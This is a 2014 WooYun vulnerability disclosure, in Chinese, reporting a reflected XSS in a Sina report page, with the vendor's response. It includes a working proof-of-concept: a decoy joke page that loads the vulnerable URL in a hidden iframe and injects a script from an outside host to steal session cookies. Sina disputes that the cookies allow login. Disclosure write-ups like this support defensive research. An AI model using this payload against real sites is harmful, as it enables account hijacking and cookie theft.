当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-079912

漏洞标题:一个xss反映新浪架构缺陷

相关厂商:新浪

漏洞作者: 路人甲

提交时间:2014-10-19 10:21

修复时间:2014-12-03 10:22

公开时间:2014-12-03 10:22

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-19: 细节已通知厂商并且等待厂商处理中
2014-10-20: 厂商已经确认,细节仅向厂商公开
2014-10-30: 细节向核心白帽子及相关领域专家公开
2014-11-09: 细节向普通白帽子公开
2014-11-19: 细节向实习白帽子公开
2014-12-03: 细节向公众公开

简要描述:

一个xss控制新浪账户、微博

详细说明:

#1>
看xss,看到了这篇帖子

 WooYun: 跨站脚本-可以让战场离得更远(浅谈腾讯架构缺陷) 


#2>
新浪举报有一处反射xss

http://im.sina.com.cn/report.php?fid=4c96bc94d582b&token=xTbWzvB1&filename=111%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C!--


就有了接下来发生的事情。。
ps:火狐/Ie8测试的。。

漏洞证明:

#1>首先用大号我们来发一个微博

s1.jpg

s2.jpg

s3.jpg


poc:

<html>
<head>
<title>爆笑一箩筐</title>
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="refresh" content="3;url=http://www.baidu.com">
</head>
<body>
<h1>页面载入中,请稍候。。</h1>
<iframe style="position:absolute;top:-1000px;left:-1000px;" src='http://im.sina.com.cn/report.php?fid=4c96bc94d582b&token=xTbWzvB1&filename=%22%3E%3Cimg%20src=x%20onerror=document.body.appendChild%28createElement%28/script/.source%29%29.src=alt%20alt=//xss1xss.sinaapp.com/Ixv9F4%3E%3C!--'></iframe>
</body>
</html>


#2>没什么收听的人,就有小号测试下。

s4.jpg

s5.jpg

s6.png


#3>cookie可登录

s6.jpg

s7.png


修复方案:

。。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-10-20 11:58

厂商回复:

感谢关注新浪安全,经验证确认你所报告的反射型XSS漏洞,因新浪域和微博域均有HttpOnly保护。未发现你所报告的通过获取的cookie可登录操作问题?

最新状态:

暂无


漏洞评价:

评论